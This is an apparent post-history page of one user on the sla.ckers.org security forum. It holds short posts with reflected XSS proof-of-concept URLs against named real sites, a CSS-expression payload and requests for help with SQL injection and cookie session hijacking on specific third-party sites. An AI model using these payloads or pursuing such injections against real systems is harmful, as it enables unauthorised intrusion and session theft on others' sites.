Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 

Current Page: 1 of 2
Results 1 - 30 of 50
6 years ago
krazl
hmm.. I know it's being stored on the server.. currently I want to know any breakthrough to bypass the netsweeper system by providing a link. Anyone?
Forum: Full Disclosure
6 years ago
krazl
well known "Fail to connect"
thrill Wrote:
-------------------------------------------------------
> 172.19.110.102:8080
>
> What do you get when you check 127.0.0.1:8080?
>
> Or are you just saying that netsweeper has a vuln
> on one of your local machines?
Forum: Full Disclosure
6 years ago
krazl
I've edited most of the parameters to avoid the same thing happening to you at the office. Currently need a breakthrough to bypass netsweeper. Anyone?
CrYpTiC_MauleR Wrote:
-------------------------------------------------------
> >> Or are you just saying that netsweeper has a
> vuln on one of your local machines?
>
> lol, I just noticed the private range too O.O,
> I'll give him
Forum: Full Disclosure
6 years ago
krazl
Netsweeper... hahaha... secure but not secure enough. http://172.19.110.102:8080/webadmin/deny/index.php?dpid=-19&cat=-11&ttl=-348&groupname=obama&policyname=restrict&username=sla.ckers&userip=99.999.999.999&connectionip=256.0.0.256&nsphostname=google.com&protocol=bush&dplanguage=-&url=<script>alert("1");</script>
Forum: Full Disclosure
6 years ago
krazl
I've created my page and accidentally jumped into this:
Microsoft OLE DB Provider for Indexing Service error '80040e14'
Incorrect syntax near '&'. Expected '!', '(', NOT, ISABOUT, FORMSOF, STRING, PREFIX_STRING. SQLSTATE=42000
/search/runsearch.asp, line 167
Is there any expert here who could predict how to inject?
Forum: SQL and Code Injection
6 years ago
krazl
Stage1: put <script>decipher(document.forms.cipher); alert(document.forms.cipher.stream.value); document.forms.cipher.stream.value = document.forms.cipher.stream_copy.value;</script> in search form. Pwd : stage2 Stage2:
Forum: XSS Info
6 years ago
krazl
Is it possible to put a government website here? Let me know rsnake... krazl www.krazl.com
Forum: Full Disclosure
6 years ago
krazl
Rsnake, is it true we just create a post.php file, put this code in and run it? It seems an infinite loop to me. I can't get a clear picture of how the worm propagates itself.. Please explain. Thx in advance. I'm noob, krazl www.krazl.com
Forum: XSS Info
6 years ago
krazl
this could help
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_REFERER, $url);
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_FAILONERROR,1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION,
Forum: XSS Info
6 years ago
krazl
What I could understand.. Worm > traffic > ads > click > money hmmm...sounds good...but example? krazl www.krazl.com
Forum: XSS Info
6 years ago
krazl
Anyone pleasssseee explain implementation... Correct me if I'm wrong.
1) Create post.php file containing the above.
2) Open post.php file
3) Infinite loop!
4) Ctrl+Alt+Del > shut down browser.
I can't see any worm propagate itself.. Any expert here, please explain ... Thx in advance. I'm noob,
krazl www.krazl.com
Forum: XSS Info
6 years ago
krazl
This is top Malaysia newspaper. http://www.utusan.com.my/utusan/keyword_search.asp?NewString=<script>alert(1)</script> a simple straight forward!! krazl www.krazl.com
Forum: Full Disclosure
6 years ago
krazl
JAVA PURE EVIL?
Forum: Projects
6 years ago
krazl
Is it using this pseudo-code: Proxy > PHP curl > target web?
Forum: Search Engine Hacking and SEO
6 years ago
krazl
link overlay.
Forum: Search Engine Hacking and SEO
6 years ago
krazl
any way to overcome bandwidth shaping?
Forum: Projects
6 years ago
krazl
http://64.233.183.104/search?q=cache:DpH0lK25ua8J:www.nus.edu.sg/commencement/2007/cards/5JULY10AM.pdf+%22koh+beng+kiat%22&hl=en&ct=clnk&cd=2&gl=us&client=firefox-a
hackathology Wrote:
-------------------------------------------------------
> If i am not wrong, these cookies are used to track
> unique visitors to your site. Every 30 mins will be
> counted as 1 vi
Forum: XSS Info
6 years ago
krazl
Let's say I manage to capture a cookie. How could I use that cookie to steal the session? Is there a best example? Is it as simple as replacing our own cookie? If yes, what are the methods? noob krazl
Forum: XSS Info
6 years ago
krazl
This is confirm.. &#x3C;&#x64;&#x69;&#x76;&#x20;&#x69;&#x64;&#x3D;&#x22;&#x6D;&#x79;&#x6C;&#x6F;&#x75;&#x73;&#x79;&#x63;&#x6F;&#x64;&#x65;&#x22;&#x20;&#x65;&#x78;&#x70;&#x72;&#x3D;&#x22;&#x77;&#x69;&#x6E;&#x64;&#x6F;&#x77;&#x2E;&#x6C;&#x6F;&#x63
Forum: XSS Info
6 years ago
krazl
friendster.. <div id="mylousycode" expr="window.location('http://www.google.com')" style="background:url('javascript:eval(document.all.mylousycode.expr)')"></div>
Forum: Full Disclosure
6 years ago
krazl
Are there any experts here who know how to uncap a modem?
Forum: Projects
6 years ago
krazl
PHP curl will suit you. http://us.php.net/curl Hope this helps. krazl
Forum: Projects
6 years ago
krazl
If it's true, anybody have documentation on how to tweak?
Forum: Projects
6 years ago
krazl
Anyone have idea on this matter? http://www.geek.com/cable-modems-can-be-hacked/ I need experts review. thanks.
Forum: Projects
6 years ago
krazl
Here is the generated result.
Description : qry class
Warning : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10, 10' at line 1
ErrNo: 1064
SELECT * FROM wms_search WHERE (instr(content,'')) and unblock='Y' LIMIT -10, 10
How to proceed with injection?
Forum: SQL and Code Injection
6 years ago
krazl
which db r u using.. mysql or sql?
Forum: SQL and Code Injection
6 years ago
krazl
.net?
Forum: SQL and Code Injection
6 years ago
krazl
how to brute table name is still mystery...anybody?
Forum: SQL and Code Injection
6 years ago
krazl
Please have a quick view here.. http://aarec.com.my.tmp2.mschosting.com/blog/
Forum: SQL and Code Injection
6 years ago
krazl
cool..but hard to predict tableName
Forum: SQL and Code Injection